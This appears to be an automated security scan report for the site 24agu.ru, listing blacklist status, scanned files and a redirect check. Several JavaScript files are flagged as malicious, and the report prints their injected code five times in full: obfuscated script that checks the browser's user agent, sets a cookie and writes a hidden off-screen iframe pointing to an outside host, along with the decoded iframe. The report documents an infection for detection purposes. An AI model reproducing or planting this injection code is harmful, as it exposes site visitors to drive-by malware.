Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=24agu.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://24agu.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.24agu.ru/ | 200 OK Content-Length: 88834 Content-Type: text/html | clean |
http://www.24agu.ru/templates/ja_senecio/scripts/ja.script.js | 200 OK Content-Length: 2463 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (g_haystack, g_needle, g_offset) { var haystack = (g_haystack + '').toLowerCase(); var needle = (g_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, g_offset)) !== -1) { return index; } return false; } function user_agenta(){ var blockLista = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','I } if (!user_agenta()) { var cookie = getCookie('misspronto18auejtlanerau'); if (cookie == undefined) { setCookie('misspronto18auejtlanerau', true, 260000); document.write('<'+'i'+'fra'+'me'+' s'+'r'+'c="http://coakera.beatrix-aebischer.ch/jrtstydiuothgareheh12.html" style="po'+'si'+'tion'+':absolute'+';'+'left'+':'+'-1350px;'+'top:'+'-1350px;" height="140" width="140"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Decoded script: <iframe src="http://coakera.beatrix-aebischer.ch/jrtstydiuothgareheh12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe> Antivirus reports:
| ||
http://www.24agu.ru/templates/ja_senecio/scripts/opacity.js | 200 OK Content-Length: 2463 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (g_haystack, g_needle, g_offset) { var haystack = (g_haystack + '').toLowerCase(); var needle = (g_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, g_offset)) !== -1) { return index; } return false; } function user_agenta(){ var blockLista = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','I } if (!user_agenta()) { var cookie = getCookie('misspronto18auejtlanerau'); if (cookie == undefined) { setCookie('misspronto18auejtlanerau', true, 260000); document.write('<'+'i'+'fra'+'me'+' s'+'r'+'c="http://coakera.beatrix-aebischer.ch/jrtstydiuothgareheh12.html" style="po'+'si'+'tion'+':absolute'+';'+'left'+':'+'-1350px;'+'top:'+'-1350px;" height="140" width="140"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Decoded script: <iframe src="http://coakera.beatrix-aebischer.ch/jrtstydiuothgareheh12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe> Antivirus reports:
| ||
http://www.24agu.ru/components/com_rbids/js/countdown.js | 200 OK Content-Length: 7 Content-Type: application/x-javascript | clean |
http://www.24agu.ru/components/com_rbids/js/ratings.js | 200 OK Content-Length: 2463 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (g_haystack, g_needle, g_offset) { var haystack = (g_haystack + '').toLowerCase(); var needle = (g_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, g_offset)) !== -1) { return index; } return false; } function user_agenta(){ var blockLista = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','I } if (!user_agenta()) { var cookie = getCookie('misspronto18auejtlanerau'); if (cookie == undefined) { setCookie('misspronto18auejtlanerau', true, 260000); document.write('<'+'i'+'fra'+'me'+' s'+'r'+'c="http://coakera.beatrix-aebischer.ch/jrtstydiuothgareheh12.html" style="po'+'si'+'tion'+':absolute'+';'+'left'+':'+'-1350px;'+'top:'+'-1350px;" height="140" width="140"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Decoded script: <iframe src="http://coakera.beatrix-aebischer.ch/jrtstydiuothgareheh12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe> Antivirus reports:
| ||
http://www.24agu.ru/components/com_rbids/js/startcounter.js | 200 OK Content-Length: 2463 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (g_haystack, g_needle, g_offset) { var haystack = (g_haystack + '').toLowerCase(); var needle = (g_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, g_offset)) !== -1) { return index; } return false; } function user_agenta(){ var blockLista = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','I } if (!user_agenta()) { var cookie = getCookie('misspronto18auejtlanerau'); if (cookie == undefined) { setCookie('misspronto18auejtlanerau', true, 260000); document.write('<'+'i'+'fra'+'me'+' s'+'r'+'c="http://coakera.beatrix-aebischer.ch/jrtstydiuothgareheh12.html" style="po'+'si'+'tion'+':absolute'+';'+'left'+':'+'-1350px;'+'top:'+'-1350px;" height="140" width="140"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Decoded script: <iframe src="http://coakera.beatrix-aebischer.ch/jrtstydiuothgareheh12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe> Antivirus reports:
| ||
http://www.24agu.ru/index.php | 200 OK Content-Length: 88946 Content-Type: text/html | clean |
http://www.24agu.ru/index.php?option=com_rbids&task=listauctions&Itemid=8 | 200 OK Content-Length: 94304 Content-Type: text/html | clean |
http://www.24agu.ru/index.php?option=com_adsmanager&Itemid=13 | 200 OK Content-Length: 29987 Content-Type: text/html | clean |
http://www.24agu.ru/index.php?option=com_fireboard&Itemid=12 | 200 OK Content-Length: 75889 Content-Type: text/html | clean |
http://www.24agu.ru/components/com_fireboard/template/default/js/jquery-latest.pack.js | 200 OK Content-Length: 18 Content-Type: application/x-javascript | clean |
http://www.24agu.ru/components/com_fireboard/template/default/js/bojForumCore.js | 200 OK Content-Length: 2463 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (g_haystack, g_needle, g_offset) { var haystack = (g_haystack + '').toLowerCase(); var needle = (g_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, g_offset)) !== -1) { return index; } return false; } function user_agenta(){ var blockLista = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','I } if (!user_agenta()) { var cookie = getCookie('misspronto18auejtlanerau'); if (cookie == undefined) { setCookie('misspronto18auejtlanerau', true, 260000); document.write('<'+'i'+'fra'+'me'+' s'+'r'+'c="http://coakera.beatrix-aebischer.ch/jrtstydiuothgareheh12.html" style="po'+'si'+'tion'+':absolute'+';'+'left'+':'+'-1350px;'+'top:'+'-1350px;" height="140" width="140"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Decoded script: <iframe src="http://coakera.beatrix-aebischer.ch/jrtstydiuothgareheh12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe> Antivirus reports:
| ||
http://www.24agu.ru/components/com_fireboard/template/default/plugin/recentposts/tabber.js | 200 OK Content-Length: 17404 Content-Type: application/x-javascript | clean |
http://www.24agu.ru/index.php?option=com_content&view=article&id=1&Itemid=11 | 200 OK Content-Length: 25299 Content-Type: text/html | clean |
http://www.24agu.ru/media/system/js/caption.js | 200 OK Content-Length: 1955 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 24agu.ru
Result:
GET / HTTP/1.1
Host: 24agu.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 24agu.ru
Referer: http://www.google.com/search?q=24agu.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 24agu.ru
Referer: http://www.google.com/search?q=24agu.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.